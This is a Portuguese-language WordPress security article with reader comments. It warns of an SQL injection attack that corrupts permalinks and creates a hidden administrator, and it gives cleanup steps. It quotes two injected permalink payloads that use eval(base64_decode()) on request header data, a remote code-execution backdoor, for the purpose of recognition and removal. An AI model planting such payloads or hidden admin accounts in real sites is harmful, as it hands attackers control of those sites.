WPBeginner - Tutoriais de WordPress para iniciantes

Trusted WordPress tutorials, when you need them most.
Beginner’s Guide to WordPress
Copa WPB
25 Million+
Websites using our plugins
16+
Years of WordPress experience
3000+
WordPress tutorials
by experts

Injeção de SQL no WordPress – último ataque

Última atualização em por Editorial Staff | Avaliado por: Syed Balkhi

Compartilhar Facebook Messenger WhatsApp
Nota editorial: Ganhamos uma comissão de links de parceiros no WPBeginner. As comissões não afetam as opiniões ou avaliações de nossos editores. Saiba mais sobre Processo editorial.

Muitos sites estão sendo atingidos por um ataque SQL recente, no qual códigos estão sendo injetados em seu site. Essa injeção MySQL afeta seus permalinks, tornando-os ineficazes. Como resultado, os URLs dos posts de seu blog não funcionarão. Vários blogs do WordPress foram alvo desse ataque. Agradecemos a Andy Soward por chamar nossa atenção para esse fato.

Um dos códigos a seguir foi adicionado à sua estrutura de permalink devido a esse ataque:

%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%

“/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%

Essas aspas anexaram todos os permalinks em seu site e só podem ser alteradas se removidas manualmente.

Para corrigir isso, vá para:

Configurações > Permalinks e remova o código acima e substitua o código padrão.

A próxima coisa que você precisa fazer é ir para Usuários. Você verá que há mais de um administrador. Você não verá o nome dele listado, mas verá que a contagem aumentou. Portanto, o que você precisa fazer é examinar todos os usuários e encontrar o último que se registrou. Passe o mouse sobre esse usuário e obtenha o link. Altere o código userid= adicionando 1 a esse número. Portanto, se o último usuário que você pode ver foi o usuário nº 2, adicione 1 a ele e passe a ser 3. Você deverá descobrir que o administrador oculto tem um código estranho como primeiro nome. Exclua o código e transforme-o em um assinante. Em seguida, retorne e exclua-o.

Isso deve resolver o problema. Você também pode excluí-lo simplesmente acessando o PHPMyAdmin. Porque você verá o usuário lá.

Só queríamos divulgar essa notícia o mais rápido possível, para que nossos usuários possam ser atualizados. Certifique-se de verificar se o seu blog não está infectado. Esperamos que o WordPress lance uma versão em breve.

Além disso, se você ainda não implementou algumas dessas medidas para proteger sua área de administração do WordPress.

Popular no WPBeginner Agora mesmo!

Divulgação: Nosso conteúdo é apoiado pelo leitor. Isso significa que, se você clicar em alguns de nossos links, poderemos receber uma comissão. Veja como o WPBeginner é financiado, por que isso é importante e como você pode nos apoiar. Aqui está nosso processo editorial.

Avatar

Editorial Staff at WPBeginner is a team of WordPress experts led by Syed Balkhi with over 16 years of experience in WordPress, Web Hosting, eCommerce, SEO, and Marketing. Started in 2009, WPBeginner is now the largest free WordPress resource site in the industry and is often referred to as the Wikipedia for WordPress.

O kit de ferramentas definitivo WordPress

Obtenha acesso GRATUITO ao nosso kit de ferramentas - uma coleção de produtos e recursos relacionados ao WordPress que todo profissional deve ter!

Faça o download agora

Reader Interactions

9 ComentáriosDeixe uma resposta

  1. Syed Balkhi says

    Hey WPBeginner readers,
    Did you know you can win exciting prizes by commenting on WPBeginner?
    Every month, our top blog commenters will win HUGE rewards, including premium WordPress plugin licenses and cash prizes.
    You can get more details about the contest from here.
    Start sharing your thoughts below to stand a chance to win!

  2. ahmed_alaaedin says

    The database of my website has been injected few days ago, adding some strange characters and words after each post or page URL. I couldn’t find anything strange in the settings: permalinks or in the users menu. What to do to fix this problem, please? My hosting company has a backup of the infected database as well!

    Responder

  3. a wordpress user says

    i was hit by this twice.

    first time it was wassup plugin sql injection, this time im not sure. my hosting provider has blocked me.

    once they restore my a/c i will remove wordpres.. I have had it!

    Responder

    • Editorial Staff says

      We really appreciate this comment, the issue was not with the WP Super Cache, we believe it was the plugin called WP External Link. We uninstalled and reinstalled WP-Super Cache twice, but then we compared the development server where everything worked fine. The difference was this plugin. When we removed that plugin it worked. You may now read that post.

      Responder

      Administrador

      • lerrkin says

        Maybe that was WP External Link and Super Cache conflict…
        I see my pasted WP-Super-Cache html comment above works as html comment and is invisible :) Text was “Page not cached by WP Super Cache. No closing HTML tag. Check your theme”.
        So last Super Cache ver. promises to do not html validity check.

        Oh, I’m reading!
        Thanks a lot!

        Responder

Deixe uma resposta

Obrigado por deixar um comentário. Lembre-se de que todos os comentários são moderados de acordo com nossos política de comentários, e seu endereço de e-mail NÃO será publicado. NÃO use palavras-chave no campo do nome. Vamos ter uma conversa pessoal e significativa.

Direitos autorais © 2009 - 2024 WPBeginner LLC. Todos os direitos reservados. WPBeginner® é uma marca registrada.

Gerenciado por Awesome Motive | Hospedagem WordPress por SiteGround

Preciso de ajuda com…

Pesquisas populares:

Iniciando um blog SEO do WordPress Desempenho do WordPress Erros do WordPress Segurança do WordPress Criação de uma loja on-line